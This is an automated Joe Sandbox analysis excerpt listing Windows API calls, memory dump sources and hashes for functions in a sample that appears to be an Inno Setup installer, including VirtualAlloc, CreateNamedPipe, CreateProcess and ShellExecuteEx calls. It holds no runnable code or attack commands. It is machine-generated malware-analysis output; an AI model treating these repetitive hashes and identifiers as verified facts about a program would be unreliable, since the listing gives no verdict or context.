                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID:
                                                          • API String ID: 530164218-0
                                                          • Opcode ID: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                          • Instruction ID: 82e7bab73c65a9778cea5b734bd50d71f4a8736701fc7bbe01534373bbdf07f9
                                                          • Opcode Fuzzy Hash: 63c2204a93b3ceeccd91b68fb1f2f63f98ac991c37a9674dd692e28dceb45842
                                                          • Instruction Fuzzy Hash: 0BD05BE27011205BC701BAED54C4AC667CC4B4925671440BBF904EF257D638CD514398
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0045159F,00000000), ref: 0042CD27
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                          • Instruction ID: 582242be021ecdaa9f487f520a6273a00fb8a2f6ff7a96cbd182f7b59f56d267
                                                          • Opcode Fuzzy Hash: a20a0933f9adf495ad294cc7f43800295bba8e01ea8a7e04e2e8fcb3411a2c60
                                                          • Instruction Fuzzy Hash: 9EC08CE03222101A9E1069BD2CC521F46C8891823A3A41E3BB528E72D2E23D88262818
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8BC,0040CE68,?,00000000,?), ref: 00406ECD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                          • Opcode Fuzzy Hash: 434cd2ceddc45fc6059baf9bd558cd456b1210cf1f9af3b638900e146cb02294
                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                          APIs
                                                          • SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                            • Part of subcall function 00450688: GetLastError.KERNEL32(004504A4,0045074A,?,00000000,?,00497338,00000001,00000000,00000002,00000000,00497499,?,?,00000005,00000000,004974CD), ref: 0045068B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 734332943-0
                                                          • Opcode ID: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                          • Instruction ID: b7b79c15840fa76abef9437e43e4f8825fb2e58c400bd883dda953f657da4aaf
                                                          • Opcode Fuzzy Hash: df934b34f1bc85ce2471d95e5f96b66cab128c3cad0ff5fb16097d4bfcec1436
                                                          • Instruction Fuzzy Hash: A9C09BB93011158BDF50E6FEC5C1D0763DC6F5C30A7514166BD04CF207E668DC154B18
                                                          APIs
                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory
                                                          • String ID:
                                                          • API String ID: 1611563598-0
                                                          • Opcode ID: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                          • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                          • Opcode Fuzzy Hash: 3c8093bb5f09dc1c1582e908db928c9e5cb26b64588de7f0dbcd6adb7ad2976f
                                                          • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                          APIs
                                                          • SetErrorMode.KERNEL32(?,0042E405), ref: 0042E3F8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                          • Instruction ID: 0a31ae7c3a111c16d424c34ef622fbdc70eb0dd2bd2df7fa5b045972c40067f9
                                                          • Opcode Fuzzy Hash: f4ecfd3f9628561c4f225325444755a3e89d37cff15fe7854645b1b41ac61961
                                                          • Instruction Fuzzy Hash: C5B09B7670C6105DA719DED5B45552D63D4D7C47207E14477F000D2581D97C58014A18
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                          • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                          • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                          • Instruction ID: 536338a183f72747ee396c39aaf2d9ae1316c242f91420f2fc1fbbab771670b7
                                                          • Opcode Fuzzy Hash: cb9b9dd83b9c3a50c03624de410b9d2001f21e86ad2002bd7b0a23a4e373be6c
                                                          • Instruction Fuzzy Hash: 73519770E042099FEB00EFA5C892AAEBBF5EF49714F50417AE504E7351DB389E41CB98
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047D754,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047D70E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 626452242-0
                                                          • Opcode ID: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                          • Instruction ID: ceed5698e636368dfd76c0cd730b865cf5009e2f8cb46b99e2292a0b329ee420
                                                          • Opcode Fuzzy Hash: c7e5cdcebff257ae51aff8300cd1cc40ed83c093b3b6095f0ee234a78004d27f
                                                          • Instruction Fuzzy Hash: 7C518170A14245AFDB20DF55D8C5BAABBF9EF29304F108077E808A73A1C778AD45CB59
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED9C,?,00423887,00423C04,0041ED9C), ref: 0041F3DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                          • Instruction ID: cb23d80071df23bba1d133aab7454d5b1bd3cce231e0a29d7ee5219cf2fb9859
                                                          • Opcode Fuzzy Hash: 22959fa884de24c48d5df6d55c2b32dc96685aad46c3c62c5ebc91be37d62682
                                                          • Instruction Fuzzy Hash: 08115A752407059BDB10DF19D880B86FBE5EF58350F10C53BE9A88B385D374E84ACBA9
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00453001), ref: 00452FE3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID:
                                                          • API String ID: 1452528299-0
                                                          • Opcode ID: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                          • Instruction ID: 3c34fb880e90b623eb2bb31e9ea66b18baec95e7b0c87dab0e1dfc6834c7d9d6
                                                          • Opcode Fuzzy Hash: f08d4b25af8aa325ab52cd9faeda57ccaa32c3ce955bb7c2d9b93568a2cf152c
                                                          • Instruction Fuzzy Hash: 98014C356042046A8B15DF699C008AEFBE8EB4E72175046B7FC24D3382D6344E059798
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003C84,00007C87,00401973), ref: 00401766
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                          • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                          • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                          • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                          • Opcode Fuzzy Hash: efb61ad58cd5fb487c50d8b3f78a63cdbb479017f0edef40a54ab24c8625a7e3
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          • GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                          • SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                          • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                          • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                          • FreeLibrary.KERNEL32(00000001,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F267
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                          • API String ID: 2323315520-3614243559
                                                          • Opcode ID: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                          • Instruction ID: b3d5d35426b7a88a41f50cbf902c37b37573112488e24e2852513ec86d1b0e77
                                                          • Opcode Fuzzy Hash: 555e93f06c2ea596d0c5ea37008c95f9a766e1991345355b6851531c4bbfc724
                                                          • Instruction Fuzzy Hash: 1F3150B2600700ABEB01EBB9AC46A6B3794F728324751093FB508D72A2E77C5C55CF5C
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 0045844F
                                                          • QueryPerformanceCounter.KERNEL32(02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 00458458
                                                          • GetSystemTimeAsFileTime.KERNEL32(02213858,02213858), ref: 00458462
                                                          • GetCurrentProcessId.KERNEL32(?,02213858,00000000,004586E2,?,?,02213858,00000000,?,00458DDE,?,02213858,00000000), ref: 0045846B
                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004584E1
                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02213858,02213858), ref: 004584EF
                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458537
                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045868D,?,00000000,C0000000,00000000,00499B10,00000003,00000000,00000000,00000000,0045869E), ref: 00458570
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458619
                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045864F
                                                          • CloseHandle.KERNEL32(000000FF,00458694,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458687
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                          • API String ID: 770386003-3271284199
                                                          • Opcode ID: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                          • Instruction ID: 5a0611516353431e4aeb24f6ab6c42495b14cb215b8b3d0382893c99e5952ef8
                                                          • Opcode Fuzzy Hash: 054b3fce73081814b7d88cf5b28d8f4160fb10be08dbad5a985f56231a1c746d
                                                          • Instruction Fuzzy Hash: E8711370A003449EDB11DF65CC41B9E7BF8EB19305F1085BAF958FB282DB7899448F69
                                                          APIs
                                                            • Part of subcall function 00477E04: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                            • Part of subcall function 00477E04: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                            • Part of subcall function 00477E04: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                            • Part of subcall function 00477E04: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02212BD8,?,?,?,02212BD8), ref: 00477E60
                                                            • Part of subcall function 00477E04: CloseHandle.KERNEL32(00000000,?,?,?,02212BD8,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                            • Part of subcall function 00477EDC: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00477F6E,?,?,?,02212BD8,?,00477FD0,00000000,004780E6,?,?,-00000010,?), ref: 00477F0C
                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00478020
                                                          • GetLastError.KERNEL32(00000000,004780E6,?,?,-00000010,?), ref: 00478029
                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478076
                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0047809A
